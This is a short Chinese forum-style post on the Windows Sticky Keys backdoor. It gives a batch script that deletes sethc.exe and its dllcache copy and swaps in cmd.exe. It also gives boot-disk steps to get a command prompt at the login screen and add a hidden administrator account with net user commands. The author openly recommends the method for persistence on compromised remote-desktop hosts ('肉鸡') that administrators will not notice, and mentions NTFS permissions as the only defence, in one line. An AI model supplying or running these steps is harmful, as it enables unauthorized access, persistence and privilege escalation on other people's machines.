粘滞键漏洞

粘滞键漏洞,按5下shift后,windows就执行了system32下的sethc.exe

Windows的粘滞键。是按5下shift后，windows就执行了system32下的sethc.exe。即使
在3389中，都可以弹出！！
它本来是为不方便按组合键的人设计的。 如果我们把那个sethc.exe替换成我们想要的其它文件，比如说cmd.exe，那么就可以用cmd命令了.
其实写的批处理就可以解决了 又不麻烦

@echo off
del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
我把它保存为5shift.bat。当我们运行它的时候，sethc.exe 就被换成了改了名的cmd.exe了。
可能由于cmd也是系统文件，所以替换是并没有弹出文件保护。呵呵。

个人感觉这个后门非常实用（特别是3389肉鸡！）。哪个管理员会考虑到这种后门呢

然后你就可以创建用户了
net user [UserName [Password | *] [options] [/domain]
net user [UserName {Password | *} /add [options] [/domain]
net user [UserName [/delete] [/domain]

[color=Red][b]把sethc.exe文件的NTFS权限设置一下就安全了.[/b][/color]

用shift键破解windows的登录密码.

首先用DOS盘启动.然后转到c:\windows\system32\下面.输入如下命令:

copy sethc.exe sethc2.exe 备份粘滞键文件

copy cmd.exe sethc.exe 用cmd.exe覆盖sethc.exe

然后重启.当需要输入密码的时候按5下shift就打开cmd窗口,然后输入如下密码:

net user admin admin /add 添加admin用户,密码是admin

net localgroup administrators admin /add 提升为超级管理员